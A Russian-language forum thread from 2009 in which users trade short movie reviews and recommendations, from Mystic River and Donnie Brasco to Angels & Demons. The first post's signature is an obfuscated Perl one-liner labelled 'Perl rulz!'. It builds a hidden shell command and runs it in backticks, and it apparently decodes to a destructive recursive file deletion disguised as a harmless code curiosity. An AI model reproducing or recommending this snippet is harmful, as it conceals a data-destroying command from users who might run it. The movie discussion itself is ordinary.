Добавлено: Сб Май 09, 2009 2:21 pm Заголовок сообщения:
значит тебя тут еще не было на форуме когда мы это обсуждали) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Май 10, 2009 12:07 pm Заголовок сообщения:
Это про Гарри Поттера что ли? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Май 11, 2009 12:09 pm Заголовок сообщения:
Это я вспомнил просто одну рецензию на него:
Цитата:
Главным героем фильма будет тот же, кто и в предыдущих фильмах. Помогать ему будут те же, кто и в предыдущих фильмах. Действие будет происходить там же, где и в предыдущих фильмах, и декорации, общие планы, компьютерные спецэффеты и костюмы у персонажей будут те же, что и в предыдущих фильмах. Главным противником у героя будет тот же, кто и в предыдущих фильмах. Он будет таким же подлым и коварным, как и в предыдущих фильмах. Он будет строить те же козни, что и в предыдущих фильмах, но главный герой (тот же, что и в предыдущих фильмах) благодаря тем же качествам, что и в предыдущих фильмах, сумеет добиться того, что и в предыдущих фильмах. После чего, как и во всех предыдущих фильмах, на экране появится слово "Конец".
_________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Май 11, 2009 4:24 pm Заголовок сообщения:
Таинственная река
Троих друзей детства жизнь снова сводит вместе: у одного из них убивают дочь, второй расследует это дело, третий - главный подозреваемый. Фильм очень понравился, смесь психологической драмы и триллера. Расследование убийства девушки лишь фон, основа сюжета - личные тайны героев, порой скрытые "глубоко под водой". Неожиданные сюжетные повороты + динамичное действо держут зрителя весь фильм в напряжении. Актерская игра ( Шон Пенн, Кевин Бейкон, Тим Роббинс) и режиссура (Клинт Иствуд) гениальны.
10 из 10
Донни Браско
Очередной фильм о том, как агент фбр работает в мафии.Очередной фильм о мафии с участием Аль Пачино. Однако несмотря на некоторую банальность, фильм понравился. Порадовало то, что Аль Пачино здесь не глава мафии,как обычно, а стареющий мафиози-лузер, далеко не главный в нью-йоркской мафии.
Добавлено: Пн Май 11, 2009 5:00 pm Заголовок сообщения:
Смотрел оба, первый понравился + Я фан Клинта, а второй тоже норм, смотрел лет наверное 10 назад, там вроде ещё Депп снимается?! _________________ don't ask me how...
Добавлено: Вт Май 12, 2009 3:08 am Заголовок сообщения:
посмотрела "Ускользающую красоту"
потрясающий фильм. такой нежный, многогранный, недосказанный.
но мужикам не понравится думаю, разве что на Лив Тайлер посмотреть) _________________ Freedom's just another word for nothin' left to lose.
Добавлено: Вт Май 12, 2009 12:25 pm Заголовок сообщения:
Если кто-то пёрся с "Донни Дарко",но ещё не в курсе,что вышло продолжение,знайте:оно вышло.Хотя,по рейтингу IMDB он получил всего 4,2. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Май 12, 2009 6:23 pm Заголовок сообщения:
Мишка писал(а):
Если кто-то пёрся с "Донни Дарко",но ещё не в курсе,что вышло продолжение,знайте:оно вышло.Хотя,по рейтингу IMDB он получил всего 4,2.
Первый мне понравился,но второй может и посмотрю,просто даже если не брать рейтинги,я сомневаюсь,что продолжение лучше первой части,они вообще редко бывают лучше,тем более фильмов такого рода. _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Добавлено: Вт Май 19, 2009 11:44 pm Заголовок сообщения:
Ангелы и демоны
Фильм понравился, динамичный сюжет, качественно все снято, красивые сьемки соборов всяких. Том Хэнкс как всегда на высоте. Книгу саму не читал, так что в этом отношении сказать ничего не могу. Еще этот фильм понравился больше фильма код да винчи.
9,5 из 10